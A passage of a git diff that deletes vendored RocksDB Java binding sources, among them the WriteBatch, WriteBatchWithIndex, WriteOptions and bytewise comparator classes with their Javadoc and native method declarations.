-     * Returns the value of the Write Entry
-     *
-     * @return The slice containing the value of
-     * the WriteEntry or null if the WriteEntry has
-     * no value
-     */
-    public DirectSlice getValue() {
-      if(!value.isOwningHandle()) {
-        return null; //TODO(AR) migrate to JDK8 java.util.Optional#empty()
-      } else {
-        return value;
-      }
-    }
-
-    /**
-     * Generates a hash code for the Write Entry. NOTE: The hash code is based
-     * on the string representation of the key, so it may not work correctly
-     * with exotic custom comparators.
-     *
-     * @return The hash code for the Write Entry
-     */
-    @Override
-    public int hashCode() {
-      return (key == null) ? 0 : key.hashCode();
-    }
-
-    @Override
-    public boolean equals(final Object other) {
-      if(other == null) {
-        return false;
-      } else if (this == other) {
-        return true;
-      } else if(other instanceof WriteEntry) {
-        final WriteEntry otherWriteEntry = (WriteEntry)other;
-        return type.equals(otherWriteEntry.type)
-            && key.equals(otherWriteEntry.key)
-            && value.equals(otherWriteEntry.value);
-      } else {
-        return false;
-      }
-    }
-
-    @Override
-    public void close() {
-      value.close();
-      key.close();
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatch.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatch.java
deleted file mode 100644
index 272e9b4..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatch.java
+++ /dev/null
@@ -1,153 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * WriteBatch holds a collection of updates to apply atomically to a DB.
- *
- * The updates are applied in the order in which they are added
- * to the WriteBatch.  For example, the value of "key" will be "v3"
- * after the following batch is written:
- *
- *    batch.put("key", "v1");
- *    batch.remove("key");
- *    batch.put("key", "v2");
- *    batch.put("key", "v3");
- *
- * Multiple threads can invoke const methods on a WriteBatch without
- * external synchronization, but if any of the threads may call a
- * non-const method, all threads accessing the same WriteBatch must use
- * external synchronization.
- */
-public class WriteBatch extends AbstractWriteBatch {
-  /**
-   * Constructs a WriteBatch instance.
-   */
-  public WriteBatch() {
-    this(0);
-  }
-
-  /**
-   * Constructs a WriteBatch instance with a given size.
-   *
-   * @param reserved_bytes reserved size for WriteBatch
-   */
-  public WriteBatch(final int reserved_bytes) {
-    super(newWriteBatch(reserved_bytes));
-  }
-
-  /**
-   * Support for iterating over the contents of a batch.
-   *
-   * @param handler A handler that is called back for each
-   *                update present in the batch
-   *
-   * @throws RocksDBException If we cannot iterate over the batch
-   */
-  public void iterate(final Handler handler) throws RocksDBException {
-    iterate(nativeHandle_, handler.nativeHandle_);
-  }
-
-  /**
-   * <p>Private WriteBatch constructor which is used to construct
-   * WriteBatch instances from C++ side. As the reference to this
-   * object is also managed from C++ side the handle will be disowned.</p>
-   *
-   * @param nativeHandle address of native instance.
-   */
-  WriteBatch(final long nativeHandle) {
-    this(nativeHandle, false);
-  }
-
-  /**
-   * <p>Private WriteBatch constructor which is used to construct
-   * WriteBatch instances. </p>
-   *
-   * @param nativeHandle address of native instance.
-   * @param owningNativeHandle whether to own this reference from the C++ side or not
-   */
-  WriteBatch(final long nativeHandle, final boolean owningNativeHandle) {
-    super(nativeHandle);
-    if(!owningNativeHandle)
-      disOwnNativeHandle();
-  }
-
-  @Override protected final native void disposeInternal(final long handle);
-  @Override final native int count0(final long handle);
-  @Override final native void put(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen);
-  @Override final native void put(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen,
-      final long cfHandle);
-  @Override final native void merge(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen);
-  @Override final native void merge(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen,
-      final long cfHandle);
-  @Override final native void remove(final long handle, final byte[] key,
-      final int keyLen);
-  @Override final native void remove(final long handle, final byte[] key,
-      final int keyLen, final long cfHandle);
-  @Override
-  final native void deleteRange(final long handle, final byte[] beginKey, final int beginKeyLen,
-      final byte[] endKey, final int endKeyLen);
-  @Override
-  final native void deleteRange(final long handle, final byte[] beginKey, final int beginKeyLen,
-      final byte[] endKey, final int endKeyLen, final long cfHandle);
-  @Override final native void putLogData(final long handle,
-      final byte[] blob, final int blobLen);
-  @Override final native void clear0(final long handle);
-  @Override final native void setSavePoint0(final long handle);
-  @Override final native void rollbackToSavePoint0(final long handle);
-
-  private native static long newWriteBatch(final int reserved_bytes);
-  private native void iterate(final long handle, final long handlerHandle)
-      throws RocksDBException;
-
-
-  /**
-   * Handler callback for iterating over the contents of a batch.
-   */
-  public static abstract class Handler
-      extends AbstractImmutableNativeReference {
-    private final long nativeHandle_;
-    public Handler() {
-      super(true);
-      this.nativeHandle_ = createNewHandler0();
-    }
-
-    public abstract void put(byte[] key, byte[] value);
-    public abstract void merge(byte[] key, byte[] value);
-    public abstract void delete(byte[] key);
-    public abstract void deleteRange(byte[] beginKey, byte[] endKey);
-    public abstract void logData(byte[] blob);
-
-    /**
-     * shouldContinue is called by the underlying iterator
-     * WriteBatch::Iterate. If it returns false,
-     * iteration is halted. Otherwise, it continues
-     * iterating. The default implementation always
-     * returns true.
-     *
-     * @return boolean value indicating if the
-     *     iteration is halted.
-     */
-    public boolean shouldContinue() {
-      return true;
-    }
-
-    /**
-     * Deletes underlying C++ handler pointer.
-     */
-    @Override
-    protected void disposeInternal() {
-      disposeInternal(nativeHandle_);
-    }
-
-    private native long createNewHandler0();
-    private native void disposeInternal(final long handle);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatchInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatchInterface.java
deleted file mode 100644
index cd024ad..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatchInterface.java
+++ /dev/null
@@ -1,146 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>Defines the interface for a Write Batch which
- * holds a collection of updates to apply atomically to a DB.</p>
- */
-public interface WriteBatchInterface {
-
-    /**
-     * Returns the number of updates in the batch.
-     *
-     * @return number of items in WriteBatch
-     */
-    int count();
-
-    /**
-     * <p>Store the mapping "key-&gt;value" in the database.</p>
-     *
-     * @param key the specified key to be inserted.
-     * @param value the value associated with the specified key.
-     */
-    void put(byte[] key, byte[] value);
-
-    /**
-     * <p>Store the mapping "key-&gt;value" within given column
-     * family.</p>
-     *
-     * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-     *     instance
-     * @param key the specified key to be inserted.
-     * @param value the value associated with the specified key.
-     */
-    void put(ColumnFamilyHandle columnFamilyHandle,
-                    byte[] key, byte[] value);
-
-    /**
-     * <p>Merge "value" with the existing value of "key" in the database.
-     * "key-&gt;merge(existing, value)"</p>
-     *
-     * @param key the specified key to be merged.
-     * @param value the value to be merged with the current value for
-     * the specified key.
-     */
-    void merge(byte[] key, byte[] value);
-
-    /**
-     * <p>Merge "value" with the existing value of "key" in given column family.
-     * "key-&gt;merge(existing, value)"</p>
-     *
-     * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-     * @param key the specified key to be merged.
-     * @param value the value to be merged with the current value for
-     * the specified key.
-     */
-    void merge(ColumnFamilyHandle columnFamilyHandle,
-                      byte[] key, byte[] value);
-
-    /**
-     * <p>If the database contains a mapping for "key", erase it.  Else do nothing.</p>
-     *
-     * @param key Key to delete within database
-     */
-    void remove(byte[] key);
-
-    /**
-     * <p>If column family contains a mapping for "key", erase it.  Else do nothing.</p>
-     *
-     * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-     * @param key Key to delete within database
-     */
-    void remove(ColumnFamilyHandle columnFamilyHandle, byte[] key);
-
-    /**
-     * Removes the database entries in the range ["beginKey", "endKey"), i.e.,
-     * including "beginKey" and excluding "endKey". a non-OK status on error. It
-     * is not an error if no keys exist in the range ["beginKey", "endKey").
-     *
-     * Delete the database entry (if any) for "key". Returns OK on success, and a
-     * non-OK status on error. It is not an error if "key" did not exist in the
-     * database.
-     *
-     * @param beginKey
-     *          First key to delete within database (included)
-     * @param endKey
-     *          Last key to delete within database (excluded)
-     */
-    void deleteRange(byte[] beginKey, byte[] endKey);
-
-    /**
-     * Removes the database entries in the range ["beginKey", "endKey"), i.e.,
-     * including "beginKey" and excluding "endKey". a non-OK status on error. It
-     * is not an error if no keys exist in the range ["beginKey", "endKey").
-     *
-     * Delete the database entry (if any) for "key". Returns OK on success, and a
-     * non-OK status on error. It is not an error if "key" did not exist in the
-     * database.
-     *
-     * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-     * @param beginKey
-     *          First key to delete within database (included)
-     * @param endKey
-     *          Last key to delete within database (excluded)
-     */
-    void deleteRange(ColumnFamilyHandle columnFamilyHandle, byte[] beginKey, byte[] endKey);
-
-    /**
-     * Append a blob of arbitrary size to the records in this batch. The blob will
-     * be stored in the transaction log but not in any other file. In particular,
-     * it will not be persisted to the SST files. When iterating over this
-     * WriteBatch, WriteBatch::Handler::LogData will be called with the contents
-     * of the blob as it is encountered. Blobs, puts, deletes, and merges will be
-     * encountered in the same order in thich they were inserted. The blob will
-     * NOT consume sequence number(s) and will NOT increase the count of the batch
-     *
-     * Example application: add timestamps to the transaction log for use in
-     * replication.
-     *
-     * @param blob binary object to be inserted
-     */
-    void putLogData(byte[] blob);
-
-    /**
-     * Clear all updates buffered in this batch
-     */
-    void clear();
-
-    /**
-     * Records the state of the batch for future calls to RollbackToSavePoint().
-     * May be called multiple times to set multiple save points.
-     */
-    void setSavePoint();
-
-    /**
-     * Remove all entries in this batch (Put, Merge, Delete, PutLogData) since
-     * the most recent call to SetSavePoint() and removes the most recent save
-     * point.
-     *
-     * @throws RocksDBException if there is no previous call to SetSavePoint()
-     */
-    void rollbackToSavePoint() throws RocksDBException;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java
deleted file mode 100644
index fdf89b2..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java
+++ /dev/null
@@ -1,282 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Similar to {@link org.rocksdb.WriteBatch} but with a binary searchable
- * index built for all the keys inserted.
- *
- * Calling put, merge, remove or putLogData calls the same function
- * as with {@link org.rocksdb.WriteBatch} whilst also building an index.
- *
- * A user can call {@link org.rocksdb.WriteBatchWithIndex#newIterator()} to
- * create an iterator over the write batch or
- * {@link org.rocksdb.WriteBatchWithIndex#newIteratorWithBase(org.rocksdb.RocksIterator)}
- * to get an iterator for the database with Read-Your-Own-Writes like capability
- */
-public class WriteBatchWithIndex extends AbstractWriteBatch {
-  /**
-   * Creates a WriteBatchWithIndex where no bytes
-   * are reserved up-front, bytewise comparison is
-   * used for fallback key comparisons,
-   * and duplicate keys operations are retained
-   */
-  public WriteBatchWithIndex() {
-    super(newWriteBatchWithIndex());
-  }
-
-
-  /**
-   * Creates a WriteBatchWithIndex where no bytes
-   * are reserved up-front, bytewise comparison is
-   * used for fallback key comparisons, and duplicate key
-   * assignment is determined by the constructor argument
-   *
-   * @param overwriteKey if true, overwrite the key in the index when
-   *   inserting a duplicate key, in this way an iterator will never
-   *   show two entries with the same key.
-   */
-  public WriteBatchWithIndex(final boolean overwriteKey) {
-    super(newWriteBatchWithIndex(overwriteKey));
-  }
-
-  /**
-   * Creates a WriteBatchWithIndex
-   *
-   * @param fallbackIndexComparator We fallback to this comparator
-   *  to compare keys within a column family if we cannot determine
-   *  the column family and so look up it's comparator.
-   *
-   * @param reservedBytes reserved bytes in underlying WriteBatch
-   *
-   * @param overwriteKey if true, overwrite the key in the index when
-   *   inserting a duplicate key, in this way an iterator will never
-   *   show two entries with the same key.
-   */
-  public WriteBatchWithIndex(
-      final AbstractComparator<? extends AbstractSlice<?>>
-          fallbackIndexComparator, final int reservedBytes,
-      final boolean overwriteKey) {
-    super(newWriteBatchWithIndex(fallbackIndexComparator.getNativeHandle(),
-        reservedBytes, overwriteKey));
-  }
-
-  /**
-   * Create an iterator of a column family. User can call
-   * {@link org.rocksdb.RocksIteratorInterface#seek(byte[])} to
-   * search to the next entry of or after a key. Keys will be iterated in the
-   * order given by index_comparator. For multiple updates on the same key,
-   * each update will be returned as a separate entry, in the order of update
-   * time.
-   *
-   * @param columnFamilyHandle The column family to iterate over
-   * @return An iterator for the Write Batch contents, restricted to the column
-   * family
-   */
-  public WBWIRocksIterator newIterator(
-      final ColumnFamilyHandle columnFamilyHandle) {
-    return new WBWIRocksIterator(this, iterator1(nativeHandle_,
-            columnFamilyHandle.nativeHandle_));
-  }
-
-  /**
-   * Create an iterator of the default column family. User can call
-   * {@link org.rocksdb.RocksIteratorInterface#seek(byte[])} to
-   * search to the next entry of or after a key. Keys will be iterated in the
-   * order given by index_comparator. For multiple updates on the same key,
-   * each update will be returned as a separate entry, in the order of update
-   * time.
-   *
-   * @return An iterator for the Write Batch contents
-   */
-  public WBWIRocksIterator newIterator() {
-    return new WBWIRocksIterator(this, iterator0(nativeHandle_));
-  }
-
-  /**
-   * Provides Read-Your-Own-Writes like functionality by
-   * creating a new Iterator that will use {@link org.rocksdb.WBWIRocksIterator}
-   * as a delta and baseIterator as a base
-   *
-   * @param columnFamilyHandle The column family to iterate over
-   * @param baseIterator The base iterator,
-   *   e.g. {@link org.rocksdb.RocksDB#newIterator()}
-   * @return An iterator which shows a view comprised of both the database
-   * point-in-time from baseIterator and modifications made in this write batch.
-   */
-  public RocksIterator newIteratorWithBase(
-      final ColumnFamilyHandle columnFamilyHandle,
-      final RocksIterator baseIterator) {
-    RocksIterator iterator = new RocksIterator(
-        baseIterator.parent_,
-        iteratorWithBase(nativeHandle_,
-                columnFamilyHandle.nativeHandle_,
-                baseIterator.nativeHandle_));
-    //when the iterator is deleted it will also delete the baseIterator
-    baseIterator.disOwnNativeHandle();
-    return iterator;
-  }
-
-  /**
-   * Provides Read-Your-Own-Writes like functionality by
-   * creating a new Iterator that will use {@link org.rocksdb.WBWIRocksIterator}
-   * as a delta and baseIterator as a base. Operates on the default column
-   * family.
-   *
-   * @param baseIterator The base iterator,
-   *   e.g. {@link org.rocksdb.RocksDB#newIterator()}
-   * @return An iterator which shows a view comprised of both the database
-   * point-in-timefrom baseIterator and modifications made in this write batch.
-   */
-  public RocksIterator newIteratorWithBase(final RocksIterator baseIterator) {
-    return newIteratorWithBase(baseIterator.parent_.getDefaultColumnFamily(),
-        baseIterator);
-  }
-
-  /**
-   * Similar to {@link RocksDB#get(ColumnFamilyHandle, byte[])} but will only
-   * read the key from this batch.
-   *
-   * @param columnFamilyHandle The column family to retrieve the value from
-   * @param options The database options to use
-   * @param key The key to read the value for
-   *
-   * @return a byte array storing the value associated with the input key if
-   *     any. null if it does not find the specified key.
-   *
-   * @throws RocksDBException if the batch does not have enough data to resolve
-   * Merge operations, MergeInProgress status may be returned.
-   */
-  public byte[] getFromBatch(final ColumnFamilyHandle columnFamilyHandle,
-      final DBOptions options, final byte[] key) throws RocksDBException {
-    return getFromBatch(nativeHandle_, options.nativeHandle_,
-        key, key.length, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Similar to {@link RocksDB#get(byte[])} but will only
-   * read the key from this batch.
-   *
-   * @param options The database options to use
-   * @param key The key to read the value for
-   *
-   * @return a byte array storing the value associated with the input key if
-   *     any. null if it does not find the specified key.
-   *
-   * @throws RocksDBException if the batch does not have enough data to resolve
-   * Merge operations, MergeInProgress status may be returned.
-   */
-  public byte[] getFromBatch(final DBOptions options, final byte[] key)
-      throws RocksDBException {
-    return getFromBatch(nativeHandle_, options.nativeHandle_, key, key.length);
-  }
-
-  /**
-   * Similar to {@link RocksDB#get(ColumnFamilyHandle, byte[])} but will also
-   * read writes from this batch.
-   *
-   * This function will query both this batch and the DB and then merge
-   * the results using the DB's merge operator (if the batch contains any
-   * merge requests).
-   *
-   * Setting {@link ReadOptions#setSnapshot(long, long)} will affect what is
-   * read from the DB but will NOT change which keys are read from the batch
-   * (the keys in this batch do not yet belong to any snapshot and will be
-   * fetched regardless).
-   *
-   * @param db The Rocks database
-   * @param columnFamilyHandle The column family to retrieve the value from
-   * @param options The read options to use
-   * @param key The key to read the value for
-   *
-   * @return a byte array storing the value associated with the input key if
-   *     any. null if it does not find the specified key.
-   *
-   * @throws RocksDBException if the value for the key cannot be read
-   */
-  public byte[] getFromBatchAndDB(final RocksDB db, final ColumnFamilyHandle columnFamilyHandle,
-      final ReadOptions options, final byte[] key) throws RocksDBException {
-    return getFromBatchAndDB(nativeHandle_, db.nativeHandle_,
-        options.nativeHandle_, key, key.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Similar to {@link RocksDB#get(byte[])} but will also
-   * read writes from this batch.
-   *
-   * This function will query both this batch and the DB and then merge
-   * the results using the DB's merge operator (if the batch contains any
-   * merge requests).
-   *
-   * Setting {@link ReadOptions#setSnapshot(long, long)} will affect what is
-   * read from the DB but will NOT change which keys are read from the batch
-   * (the keys in this batch do not yet belong to any snapshot and will be
-   * fetched regardless).
-   *
-   * @param db The Rocks database
-   * @param options The read options to use
-   * @param key The key to read the value for
-   *
-   * @return a byte array storing the value associated with the input key if
-   *     any. null if it does not find the specified key.
-   *
-   * @throws RocksDBException if the value for the key cannot be read
-   */
-  public byte[] getFromBatchAndDB(final RocksDB db, final ReadOptions options,
-      final byte[] key) throws RocksDBException {
-    return getFromBatchAndDB(nativeHandle_, db.nativeHandle_,
-        options.nativeHandle_, key, key.length);
-  }
-
-  @Override protected final native void disposeInternal(final long handle);
-  @Override final native int count0(final long handle);
-  @Override final native void put(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen);
-  @Override final native void put(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen,
-      final long cfHandle);
-  @Override final native void merge(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen);
-  @Override final native void merge(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen,
-      final long cfHandle);
-  @Override final native void remove(final long handle, final byte[] key,
-      final int keyLen);
-  @Override final native void remove(final long handle, final byte[] key,
-      final int keyLen, final long cfHandle);
-  @Override
-  final native void deleteRange(final long handle, final byte[] beginKey, final int beginKeyLen,
-      final byte[] endKey, final int endKeyLen);
-  @Override
-  final native void deleteRange(final long handle, final byte[] beginKey, final int beginKeyLen,
-      final byte[] endKey, final int endKeyLen, final long cfHandle);
-  @Override final native void putLogData(final long handle, final byte[] blob,
-      final int blobLen);
-  @Override final native void clear0(final long handle);
-  @Override final native void setSavePoint0(final long handle);
-  @Override final native void rollbackToSavePoint0(final long handle);
-
-  private native static long newWriteBatchWithIndex();
-  private native static long newWriteBatchWithIndex(final boolean overwriteKey);
-  private native static long newWriteBatchWithIndex(
-      final long fallbackIndexComparatorHandle, final int reservedBytes,
-      final boolean overwriteKey);
-  private native long iterator0(final long handle);
-  private native long iterator1(final long handle, final long cfHandle);
-  private native long iteratorWithBase(final long handle,
-      final long baseIteratorHandle, final long cfHandle);
-  private native byte[] getFromBatch(final long handle, final long optHandle,
-      final byte[] key, final int keyLen);
-  private native byte[] getFromBatch(final long handle, final long optHandle,
-      final byte[] key, final int keyLen, final long cfHandle);
-  private native byte[] getFromBatchAndDB(final long handle,
-      final long dbHandle,  final long readOptHandle, final byte[] key,
-      final int keyLen);
-  private native byte[] getFromBatchAndDB(final long handle,
-      final long dbHandle, final long readOptHandle, final byte[] key,
-      final int keyLen, final long cfHandle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteOptions.java
deleted file mode 100644
index b9e8ad8..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteOptions.java
+++ /dev/null
@@ -1,159 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Options that control write operations.
- *
- * Note that developers should call WriteOptions.dispose() to release the
- * c++ side memory before a WriteOptions instance runs out of scope.
- */
-public class WriteOptions extends RocksObject {
-  /**
-   * Construct WriteOptions instance.
-   */
-  public WriteOptions() {
-    super(newWriteOptions());
-
-  }
-
-  /**
-   * If true, the write will be flushed from the operating system
-   * buffer cache (by calling WritableFile::Sync()) before the write
-   * is considered complete.  If this flag is true, writes will be
-   * slower.
-   *
-   * If this flag is false, and the machine crashes, some recent
-   * writes may be lost.  Note that if it is just the process that
-   * crashes (i.e., the machine does not reboot), no writes will be
-   * lost even if sync==false.
-   *
-   * In other words, a DB write with sync==false has similar
-   * crash semantics as the "write()" system call.  A DB write
-   * with sync==true has similar crash semantics to a "write()"
-   * system call followed by "fdatasync()".
-   *
-   * Default: false
-   *
-   * @param flag a boolean flag to indicate whether a write
-   *     should be synchronized.
-   * @return the instance of the current WriteOptions.
-   */
-  public WriteOptions setSync(final boolean flag) {
-    setSync(nativeHandle_, flag);
-    return this;
-  }
-
-  /**
-   * If true, the write will be flushed from the operating system
-   * buffer cache (by calling WritableFile::Sync()) before the write
-   * is considered complete.  If this flag is true, writes will be
-   * slower.
-   *
-   * If this flag is false, and the machine crashes, some recent
-   * writes may be lost.  Note that if it is just the process that
-   * crashes (i.e., the machine does not reboot), no writes will be
-   * lost even if sync==false.
-   *
-   * In other words, a DB write with sync==false has similar
-   * crash semantics as the "write()" system call.  A DB write
-   * with sync==true has similar crash semantics to a "write()"
-   * system call followed by "fdatasync()".
-   *
-   * @return boolean value indicating if sync is active.
-   */
-  public boolean sync() {
-    return sync(nativeHandle_);
-  }
-
-  /**
-   * If true, writes will not first go to the write ahead log,
-   * and the write may got lost after a crash.
-   *
-   * @param flag a boolean flag to specify whether to disable
-   *     write-ahead-log on writes.
-   * @return the instance of the current WriteOptions.
-   */
-  public WriteOptions setDisableWAL(final boolean flag) {
-    setDisableWAL(nativeHandle_, flag);
-    return this;
-  }
-
-  /**
-   * If true, writes will not first go to the write ahead log,
-   * and the write may got lost after a crash.
-   *
-   * @return boolean value indicating if WAL is disabled.
-   */
-  public boolean disableWAL() {
-    return disableWAL(nativeHandle_);
-  }
-
-  /**
-   * If true and if user is trying to write to column families that don't exist
-   * (they were dropped), ignore the write (don't return an error). If there
-   * are multiple writes in a WriteBatch, other writes will succeed.
-   *
-   * Default: false
-   *
-   * @param ignoreMissingColumnFamilies true to ignore writes to column families
-   *     which don't exist
-   * @return the instance of the current WriteOptions.
-   */
-  public WriteOptions setIgnoreMissingColumnFamilies(
-      final boolean ignoreMissingColumnFamilies) {
-    setIgnoreMissingColumnFamilies(nativeHandle_, ignoreMissingColumnFamilies);
-    return this;
-  }
-
-  /**
-   * If true and if user is trying to write to column families that don't exist
-   * (they were dropped), ignore the write (don't return an error). If there
-   * are multiple writes in a WriteBatch, other writes will succeed.
-   *
-   * Default: false
-   *
-   * @return true if writes to column families which don't exist are ignored
-   */
-  public boolean ignoreMissingColumnFamilies() {
-    return ignoreMissingColumnFamilies(nativeHandle_);
-  }
-
-  /**
-   * If true and we need to wait or sleep for the write request, fails
-   * immediately with {@link Status.Code#Incomplete}.
-   *
-   * @param noSlowdown true to fail write requests if we need to wait or sleep
-   * @return the instance of the current WriteOptions.
-   */
-  public WriteOptions setNoSlowdown(final boolean noSlowdown) {
-    setNoSlowdown(nativeHandle_, noSlowdown);
-    return this;
-  }
-
-  /**
-   * If true and we need to wait or sleep for the write request, fails
-   * immediately with {@link Status.Code#Incomplete}.
-   *
-   * @return true when write requests are failed if we need to wait or sleep
-   */
-  public boolean noSlowdown() {
-    return noSlowdown(nativeHandle_);
-  }
-
-  private native static long newWriteOptions();
-  private native void setSync(long handle, boolean flag);
-  private native boolean sync(long handle);
-  private native void setDisableWAL(long handle, boolean flag);
-  private native boolean disableWAL(long handle);
-  private native void setIgnoreMissingColumnFamilies(final long handle,
-      final boolean ignoreMissingColumnFamilies);
-  private native boolean ignoreMissingColumnFamilies(final long handle);
-  private native void setNoSlowdown(final long handle,
-      final boolean noSlowdown);
-  private native boolean noSlowdown(final long handle);
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/BytewiseComparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/BytewiseComparator.java
deleted file mode 100644
index 18f7391..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/BytewiseComparator.java
+++ /dev/null
@@ -1,91 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb.util;
-
-import org.rocksdb.*;
-
-import java.nio.ByteBuffer;
-
-/**
- * This is a Java Native implementation of the C++
- * equivalent BytewiseComparatorImpl using {@link Slice}
- *
- * The performance of Comparators implemented in Java is always
- * less than their C++ counterparts due to the bridging overhead,
- * as such you likely don't want to use this apart from benchmarking
- * and you most likely instead wanted
- * {@link org.rocksdb.BuiltinComparator#BYTEWISE_COMPARATOR}
- */
-public class BytewiseComparator extends Comparator {
-
-  public BytewiseComparator(final ComparatorOptions copt) {
-    super(copt);
-  }
-
-  @Override
-  public String name() {
-    return "rocksdb.java.BytewiseComparator";
-  }
-
-  @Override
-  public int compare(final Slice a, final Slice b) {
-    return compare(a.data(), b.data());
-  }
-
-  @Override
-  public String findShortestSeparator(final String start,
-                                      final Slice limit) {
-    final byte[] startBytes = start.getBytes();
-    final byte[] limitBytes = limit.data();
-
-    // Find length of common prefix
-    final int min_length = Math.min(startBytes.length, limit.size());
-    int diff_index = 0;
-    while ((diff_index < min_length) &&
-        (startBytes[diff_index] == limitBytes[diff_index])) {
-      diff_index++;
-    }
-
-    if (diff_index >= min_length) {
-      // Do not shorten if one string is a prefix of the other
-    } else {
-      final byte diff_byte = startBytes[diff_index];
-      if(diff_byte < 0xff && diff_byte + 1 < limitBytes[diff_index]) {
-        final byte shortest[] = new byte[diff_index + 1];
-        System.arraycopy(startBytes, 0, shortest, 0, diff_index + 1);
-        shortest[diff_index]++;
-        assert(compare(shortest, limitBytes) < 0);
-        return new String(shortest);
-      }
-    }
-
-    return null;
-  }
-
-  private static int compare(final byte[] a, final byte[] b) {
-    return ByteBuffer.wrap(a).compareTo(ByteBuffer.wrap(b));
-  }
-
-  @Override
-  public String findShortSuccessor(final String key) {
-    final byte[] keyBytes = key.getBytes();
-
-    // Find first character that can be incremented
-    final int n = keyBytes.length;
-    for (int i = 0; i < n; i++) {
-      final byte byt = keyBytes[i];
-      if (byt != 0xff) {
-        final byte shortSuccessor[] = new byte[i + 1];
-        System.arraycopy(keyBytes, 0, shortSuccessor, 0, i + 1);
-        shortSuccessor[i]++;
-        return new String(shortSuccessor);
-      }
-    }
-    // *key is a run of 0xffs.  Leave it alone.
-
-    return null;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java
deleted file mode 100644
index 9417544..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java
+++ /dev/null
@@ -1,88 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb.util;
-
-import org.rocksdb.ComparatorOptions;
-import org.rocksdb.DirectComparator;
-import org.rocksdb.DirectSlice;
-
-import java.nio.ByteBuffer;
-
-/**
- * This is a Java Native implementation of the C++
- * equivalent BytewiseComparatorImpl using {@link DirectSlice}
- *
- * The performance of Comparators implemented in Java is always
- * less than their C++ counterparts due to the bridging overhead,
- * as such you likely don't want to use this apart from benchmarking
- * and you most likely instead wanted
- * {@link org.rocksdb.BuiltinComparator#BYTEWISE_COMPARATOR}
- */
-public class DirectBytewiseComparator extends DirectComparator {
-
-  public DirectBytewiseComparator(final ComparatorOptions copt) {
-    super(copt);
-  }
-
-  @Override
-  public String name() {
-    return "rocksdb.java.DirectBytewiseComparator";
-  }
-
-  @Override
-  public int compare(final DirectSlice a, final DirectSlice b) {
-    return a.data().compareTo(b.data());
-  }
-
-  @Override
-  public String findShortestSeparator(final String start,
-      final DirectSlice limit) {
-    final byte[] startBytes = start.getBytes();
-
-    // Find length of common prefix
-    final int min_length = Math.min(startBytes.length, limit.size());
-    int diff_index = 0;
-    while ((diff_index < min_length) &&
-        (startBytes[diff_index] == limit.get(diff_index))) {
-      diff_index++;
-    }
-
-    if (diff_index >= min_length) {
-      // Do not shorten if one string is a prefix of the other
-    } else {
-      final byte diff_byte = startBytes[diff_index];
-      if(diff_byte < 0xff && diff_byte + 1 < limit.get(diff_index)) {
-        final byte shortest[] = new byte[diff_index + 1];
